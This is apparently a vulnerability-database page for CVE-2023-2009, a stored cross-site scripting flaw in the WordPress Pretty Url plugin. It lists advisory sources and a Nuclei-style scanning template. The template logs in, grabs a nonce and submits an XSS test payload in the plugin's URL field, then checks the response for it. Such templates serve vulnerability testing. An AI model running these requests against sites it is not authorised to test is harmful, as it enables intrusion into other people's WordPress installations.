| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2023-2009 | 15 May 2023 16:43 | – | circl |
| WordPress plugin Pretty Url URL field cross-site scripting vulnerability | 15 May 2023 00:00 | – | cnnvd |
| CVE-2023-2009 | 15 May 2023 12:15 | – | cve |
| CVE-2023-2009 Pretty Url <= 1.5.4 - Admin+ Stored XSS in plugin settings | 15 May 2023 12:15 | – | cvelist |
| EUVD-2023-33539 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2023-2009 | 15 May 2023 13:15 | – | nvd |
| CVE-2023-2009 | 15 May 2023 13:15 | – | osv |
| WordPress Pretty Url Plugin <= 1.5.4 is vulnerable to Cross Site Scripting (XSS) | 26 Apr 2023 00:00 | – | patchstack |
| Cross site scripting | 15 May 2023 13:15 | – | prion |
| PT-2023-17407 · WordPress · Pretty Url | 15 May 2023 00:00 | – | ptsecurity |

```yaml
id: CVE-2023-2009
info:
  name: Pretty Url <= 1.5.4 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
  impact: |
    High-privilege authenticated attackers can inject stored XSS through the URL field in plugin settings, potentially compromising other administrator accounts even when unfiltered_html capability is disabled in WordPress multisite setups.
  remediation: |
    Update Pretty Url plugin to a version newer than 1.5.4 that properly sanitizes and escapes the URL field in plugin settings to prevent stored XSS attacks.
  reference:
    - https://wpscan.com/vulnerability/f7988a18-ba9d-4ead-82c8-30ea8223846f
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2009
    - https://wordpress.org/plugins/pretty-url/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2023-2009
    cwe-id: CWE-79
    epss-score: 0.00824
    epss-percentile: 0.52741
    cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: pretty_url_project
    product: pretty_url
    framework: wordpress
  tags: cve2023,cve,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project,vuln
http:
  - raw:
      # Request 1: authenticate with the supplied high-privilege account
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      # Request 2: load the plugin settings page so the nonce can be extracted
      - |
        GET /wp-admin/admin.php?page=prettyurls HTTP/1.1
        Host: {{Hostname}}
      # Request 3: submit the settings form with the test marker in the url field
      - |
        POST /wp-admin/admin.php?page=prettyurls HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=
    redirects: true
    # Flag the host only if the third response returns the marker unescaped
    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(body_3, "<img src=x onerror=alert(document.domain)>")'
          - 'contains(body_3, "prettyurls")'
        condition: and
    # Pull the settings-form nonce out of the response body for request 3
    extractors:
      - type: regex
        internal: true
        name: nonce
        part: body
        group: 1
        regex:
          - 'name="_wpnonce" value="([0-9a-z]+)" />'
# digest: 490a00463044022022869b91e5c3a9ce33599b59ab824488508b5f199980f16f7399b7a27eebcbeb022051b23e93efd73e009347e7902d9d7c8033cebd47b306ad2f0be2ed5cf12c3f11:922c64590222798bb761d5b6d8e72950
```